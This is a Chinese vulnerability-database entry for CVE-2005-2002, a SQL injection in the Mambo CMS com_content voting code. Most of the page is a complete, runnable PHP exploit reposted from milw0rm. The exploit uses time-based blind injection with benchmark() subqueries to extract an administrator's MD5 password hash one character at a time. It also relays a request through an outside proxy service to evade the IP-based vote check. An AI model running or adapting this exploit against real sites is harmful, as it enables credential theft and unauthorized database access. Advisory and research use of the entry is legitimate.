Mambo com_content 远程SQL注入漏洞
漏洞ID | 1108865 | 漏洞类型 | SQL注入 |
发布时间 | 2005-06-15 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-2002 |
CNNVD-ID | CNNVD-200506-138 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。–content.php–100case’vote’:101recordVote($url,$user_rating,$cid,$database);102break;…1478$query=”UPDATE#__content_rating”1479.”nSETrating_count=rating_count+1,”1450.”nrating_sum=rating_sum+$user_rating,”1451.”nlastip=’$currip'”1452.”nWHEREcontent_id=”.$cid1453;—————-在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。
|漏洞EXP
#!/usr/bin/php -q
Mambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
<?php
/*
Mambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
*content rating using sub query to select from mos_users
Requirement:
PHP 4.x with curl extension
Description:
The problem occur because $user_rating variable is not properly sanitize when for use in SQL query
for UPDATE statement.
>From content.php (componentscom_contentcontent.php)
-----
function recordVote ( $url, $user_rating, $cid, $database ){
$cid = intval( $cid );
if ( ( $user_rating >= 1 ) and ( $user_rating <= 5 ) ) { <--- 1st Checkpoint
$currip = getenv( 'REMOTE_ADDR' );
$query = "SELECT * FROM #__content_rating WHERE content_id = $cid";
$database->setQuery( $query );
$votesdb = NULL;
if ( !( $database->loadObject( $votesdb ) ) ) {
$query = "INSERT INTO #__content_rating ( content_id, lastip, rating_sum, rating_count )"
. "n VALUES ( '$cid', '$currip', '$user_rating', '1' )";
$database->setQuery( $query );
$database->query() or die( $database->stderr() );;
} else {
if ($currip <> ($votesdb->lastip)) { <-- 2nd Checkpoint
$query = "UPDATE #__content_rating"
. "n SET rating_count = rating_count + 1,"
. "n rating_sum = rating_sum + $user_rating," <--- PROBLEM
. "n lastip = '$currip'"
. "n WHERE content_id = ". $cid
;
$database->setQuery( $query );
$database->query() or die( $database->stderr() );
} else {
mosRedirect ( $url, _ALREADY_VOTE );
}
}
mosRedirect ( $url, _THANKS );
}
}
-----
User may escape 1st checkpoint by passing (1-5)(string) value to $user_rating .In PHP beginning
number in string will be use when comparing number with string.
The 2nd checkpoint will check previous user's ip rated the content. Update statement will only
execute when previous ip is different from current ip. This proof of concept will use cgi proxy from
http://projectbypass.com to make it possible.
In mySQL 4.1 and above it is possible to use "sub select" in any SQL statement. We will using
"blind fishing" with sub select to fetch password hash (md5) for supplied user id.
Exploiting step:
1) rate from different ip
2) check time for standard page loading
3) check time for page loading when benchmark executed.
* If error occur mysql version is < 4.1 (no support for sub select)
4) double the benchmark value. Blind fishing will use this value to do the query.
5) blind fishing with sub select.
Special thanks:
al3ndaleeb at hotmail.com
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension requiredn";
exit;
}
ini_set("max_execution_time","999999");
$benchcount = 150000;
$aid= 62;
$cid = 2;
$charmap = array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[1]){
$url = $argv[1];
if ($argv[2])
$aid = $argv[2];
if ($argv[3])
$benchcount = $argv[3];
if ($argv[4])
$proxy = $argv[4];
}
else {
echo "Usage: ".$argv[0]." <URL> [userid] [benchmarkcount] [proxy]nn";
echo "tURLt URL to mambo site (ex: http://127.0.0.1)n";
echo "taidt userid to get (default: 62 (admin))n";
echo "tbenchmarkcountt benchmark count (default: 150000)n";
echo "tproxyt optional proxy url (ex: http://10.10.10.10:8080)n";
exit;
}
// rate from different ip (using http://projectbypass.com)
$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
// standard page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$sloadtime = floatval($stop - $start);
echo "standard page loading =".$sloadtime."n";
// benchmark page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$bloadtime = floatval($stop - $start);
echo "bencmark page loading =".$bloadtime."n";
// check if SQL query failed
if (ereg("DB function failed",$res)){
echo "[x] mysql < 4.1 detected - not exploitablen";
exit();
}
if ($bloadtime <= $sloadtime + 2){
echo "[x] increase your benchmark countn";
exit();
}
echo "Take your time for Teh Tarik... please wait ...nn";
echo "Result:n";
echo "tUserid = $aidn";
echo "tPassword Hash = ";
// starting fetch password
$benchcount = $benchcount*2;
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
$start = time();
echo chr($char);
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+and+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$stop = time();
$xloadtime = floatval($stop - $start);
if (floatval($xloadtime) > $bloadtime){
$hash .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char == 103){
echo "nntNot Vulnerable or Something wrong occur ...n";
exit;
}
}
}
echo "n";
?>
// milw0rm.com [2005-06-15]
|参考资料
来源:SECUNIA
名称:15710
链接:http://secunia.com/advisories/15710
来源:BID
名称:13966
链接:http://www.securityfocus.com/bid/13966
来源:OSVDB
名称:17323
链接:http://www.osvdb.org/17323
来源:BUGTRAQ
名称:20050615Mambo4.5.2.2SQLInjectioninUPDATEstatement
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111885974124936&w;=2
来源:mamboforge.net
链接:http://mamboforge.net/frs/download.php/6153/CHANGELOG
来源:SECTRACK
名称:1014222
链接:http://securitytracker.com/id?1014222
相关推荐: Lotus Notes Domino的Web服务器的CGI漏洞
Lotus Notes Domino的Web服务器的CGI漏洞 漏洞ID 1206794 漏洞类型 未知 发布时间 1999-12-21 更新时间 2005-05-02 CVE编号 CVE-2000-0022 CNNVD-ID CNNVD-199912-068…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666